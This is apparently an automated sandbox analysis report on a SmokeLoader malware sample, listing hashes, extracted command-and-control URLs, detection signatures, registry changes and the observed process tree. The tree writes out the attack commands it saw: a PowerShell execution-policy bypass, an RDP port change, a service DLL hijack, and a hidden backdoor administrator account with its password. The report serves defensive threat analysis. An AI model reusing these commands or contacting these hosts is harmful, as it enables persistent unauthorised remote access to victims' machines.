Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-10-2021 22:54
Static task
static1
Behavioral task
behavioral1
Sample
60cdab374236b2efe894bce090719365.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
60cdab374236b2efe894bce090719365.exe
Resource
win10-en-20210920
General
-
Target
60cdab374236b2efe894bce090719365.exe
-
Size
339KB
-
MD5
60cdab374236b2efe894bce090719365
-
SHA1
fe35e203023a64e0831bdb8b4b27fc28e1feb0db
-
SHA256
0c4a2dc11b12ad8545e5397eff8bcde53238c2283905e7b49610f9cafa779800
-
SHA512
8654d91ab7c1d824c9802e2395dad3f224fc2417599c359c3d80a89b97b1331c78755369aacd2ec00dea757e165d0b7df87c3dc3ae92574ac735e5e4ee7f4da9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 58 952 powershell.exe 60 952 powershell.exe 62 952 powershell.exe 63 952 powershell.exe 65 952 powershell.exe 67 952 powershell.exe 69 952 powershell.exe 72 952 powershell.exe 74 952 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
72DA.exepid process 1828 72DA.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3036 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2468 2468 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC748.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tgk3imw3.3fl.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC705.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_yvgdfbtg.coa.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC736.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC747.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC725.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
60cdab374236b2efe894bce090719365.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60cdab374236b2efe894bce090719365.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60cdab374236b2efe894bce090719365.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 60cdab374236b2efe894bce090719365.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 65 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 62 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
60cdab374236b2efe894bce090719365.exepid process 4088 60cdab374236b2efe894bce090719365.exe 4088 60cdab374236b2efe894bce090719365.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3036 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 640 640 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
60cdab374236b2efe894bce090719365.exepid process 4088 60cdab374236b2efe894bce090719365.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 716 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeIncreaseQuotaPrivilege 1688 powershell.exe Token: SeSecurityPrivilege 1688 powershell.exe Token: SeTakeOwnershipPrivilege 1688 powershell.exe Token: SeLoadDriverPrivilege 1688 powershell.exe Token: SeSystemProfilePrivilege 1688 powershell.exe Token: SeSystemtimePrivilege 1688 powershell.exe Token: SeProfSingleProcessPrivilege 1688 powershell.exe Token: SeIncBasePriorityPrivilege 1688 powershell.exe Token: SeCreatePagefilePrivilege 1688 powershell.exe Token: SeBackupPrivilege 1688 powershell.exe Token: SeRestorePrivilege 1688 powershell.exe Token: SeShutdownPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeSystemEnvironmentPrivilege 1688 powershell.exe Token: SeRemoteShutdownPrivilege 1688 powershell.exe Token: SeUndockPrivilege 1688 powershell.exe Token: SeManageVolumePrivilege 1688 powershell.exe Token: 33 1688 powershell.exe Token: 34 1688 powershell.exe Token: 35 1688 powershell.exe Token: 36 1688 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeIncreaseQuotaPrivilege 3628 powershell.exe Token: SeSecurityPrivilege 3628 powershell.exe Token: SeTakeOwnershipPrivilege 3628 powershell.exe Token: SeLoadDriverPrivilege 3628 powershell.exe Token: SeSystemProfilePrivilege 3628 powershell.exe Token: SeSystemtimePrivilege 3628 powershell.exe Token: SeProfSingleProcessPrivilege 3628 powershell.exe Token: SeIncBasePriorityPrivilege 3628 powershell.exe Token: SeCreatePagefilePrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeRestorePrivilege 3628 powershell.exe Token: SeShutdownPrivilege 3628 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeSystemEnvironmentPrivilege 3628 powershell.exe Token: SeRemoteShutdownPrivilege 3628 powershell.exe Token: SeUndockPrivilege 3628 powershell.exe Token: SeManageVolumePrivilege 3628 powershell.exe Token: 33 3628 powershell.exe Token: 34 3628 powershell.exe Token: 35 3628 powershell.exe Token: 36 3628 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeIncreaseQuotaPrivilege 1648 powershell.exe Token: SeSecurityPrivilege 1648 powershell.exe Token: SeTakeOwnershipPrivilege 1648 powershell.exe Token: SeLoadDriverPrivilege 1648 powershell.exe Token: SeSystemProfilePrivilege 1648 powershell.exe Token: SeSystemtimePrivilege 1648 powershell.exe Token: SeProfSingleProcessPrivilege 1648 powershell.exe Token: SeIncBasePriorityPrivilege 1648 powershell.exe Token: SeCreatePagefilePrivilege 1648 powershell.exe Token: SeBackupPrivilege 1648 powershell.exe Token: SeRestorePrivilege 1648 powershell.exe Token: SeShutdownPrivilege 1648 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeSystemEnvironmentPrivilege 1648 powershell.exe Token: SeRemoteShutdownPrivilege 1648 powershell.exe Token: SeUndockPrivilege 1648 powershell.exe Token: SeManageVolumePrivilege 1648 powershell.exe Token: 33 1648 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
72DA.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3036 wrote to memory of 1828 3036 72DA.exe PID 3036 wrote to memory of 1828 3036 72DA.exe PID 1828 wrote to memory of 716 1828 72DA.exe powershell.exe PID 1828 wrote to memory of 716 1828 72DA.exe powershell.exe PID 716 wrote to memory of 1252 716 powershell.exe csc.exe PID 716 wrote to memory of 1252 716 powershell.exe csc.exe PID 1252 wrote to memory of 2136 1252 csc.exe cvtres.exe PID 1252 wrote to memory of 2136 1252 csc.exe cvtres.exe PID 716 wrote to memory of 1688 716 powershell.exe powershell.exe PID 716 wrote to memory of 1688 716 powershell.exe powershell.exe PID 716 wrote to memory of 3628 716 powershell.exe powershell.exe PID 716 wrote to memory of 3628 716 powershell.exe powershell.exe PID 716 wrote to memory of 1648 716 powershell.exe powershell.exe PID 716 wrote to memory of 1648 716 powershell.exe powershell.exe PID 716 wrote to memory of 3272 716 powershell.exe reg.exe PID 716 wrote to memory of 3272 716 powershell.exe reg.exe PID 716 wrote to memory of 3800 716 powershell.exe reg.exe PID 716 wrote to memory of 3800 716 powershell.exe reg.exe PID 716 wrote to memory of 3460 716 powershell.exe reg.exe PID 716 wrote to memory of 3460 716 powershell.exe reg.exe PID 716 wrote to memory of 4092 716 powershell.exe net.exe PID 716 wrote to memory of 4092 716 powershell.exe net.exe PID 4092 wrote to memory of 3860 4092 net.exe net1.exe PID 4092 wrote to memory of 3860 4092 net.exe net1.exe PID 716 wrote to memory of 3144 716 powershell.exe cmd.exe PID 716 wrote to memory of 3144 716 powershell.exe cmd.exe PID 3144 wrote to memory of 2324 3144 cmd.exe cmd.exe PID 3144 wrote to memory of 2324 3144 cmd.exe cmd.exe PID 2324 wrote to memory of 656 2324 cmd.exe net.exe PID 2324 wrote to memory of 656 2324 cmd.exe net.exe PID 656 wrote to memory of 1404 656 net.exe net1.exe PID 656 wrote to memory of 1404 656 net.exe net1.exe PID 716 wrote to memory of 2220 716 powershell.exe cmd.exe PID 716 wrote to memory of 2220 716 powershell.exe cmd.exe PID 2220 wrote to memory of 3232 2220 cmd.exe cmd.exe PID 2220 wrote to memory of 3232 2220 cmd.exe cmd.exe PID 3232 wrote to memory of 2196 3232 cmd.exe net.exe PID 3232 wrote to memory of 2196 3232 cmd.exe net.exe PID 2196 wrote to memory of 3876 2196 net.exe net1.exe PID 2196 wrote to memory of 3876 2196 net.exe net1.exe PID 2948 wrote to memory of 952 2948 cmd.exe net.exe PID 2948 wrote to memory of 952 2948 cmd.exe net.exe PID 952 wrote to memory of 2392 952 net.exe net1.exe PID 952 wrote to memory of 2392 952 net.exe net1.exe PID 3488 wrote to memory of 1536 3488 cmd.exe net.exe PID 3488 wrote to memory of 1536 3488 cmd.exe net.exe PID 1536 wrote to memory of 3628 1536 net.exe net1.exe PID 1536 wrote to memory of 3628 1536 net.exe net1.exe PID 3532 wrote to memory of 2516 3532 cmd.exe net.exe PID 3532 wrote to memory of 2516 3532 cmd.exe net.exe PID 2516 wrote to memory of 1444 2516 net.exe net1.exe PID 2516 wrote to memory of 1444 2516 net.exe net1.exe PID 380 wrote to memory of 1960 380 cmd.exe net.exe PID 380 wrote to memory of 1960 380 cmd.exe net.exe PID 1960 wrote to memory of 4020 1960 net.exe net1.exe PID 1960 wrote to memory of 4020 1960 net.exe net1.exe PID 1936 wrote to memory of 3800 1936 cmd.exe net.exe PID 1936 wrote to memory of 3800 1936 cmd.exe net.exe PID 3800 wrote to memory of 1992 3800 net.exe net1.exe PID 3800 wrote to memory of 1992 3800 net.exe net1.exe PID 2152 wrote to memory of 2000 2152 cmd.exe net.exe PID 2152 wrote to memory of 2000 2152 cmd.exe net.exe PID 2000 wrote to memory of 3664 2000 net.exe net1.exe PID 2000 wrote to memory of 3664 2000 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60cdab374236b2efe894bce090719365.exe"C:\Users\Admin\AppData\Local\Temp\60cdab374236b2efe894bce090719365.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\72DA.exeC:\Users\Admin\AppData\Local\Temp\72DA.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8BA2.tmp" "c:\Users\Admin\AppData\Local\Temp\lddmhxjh\CSC9E2A9D0A82214121ABF59FA852F7FDB4.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc AwpZwkyN /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc AwpZwkyN /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc AwpZwkyN /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
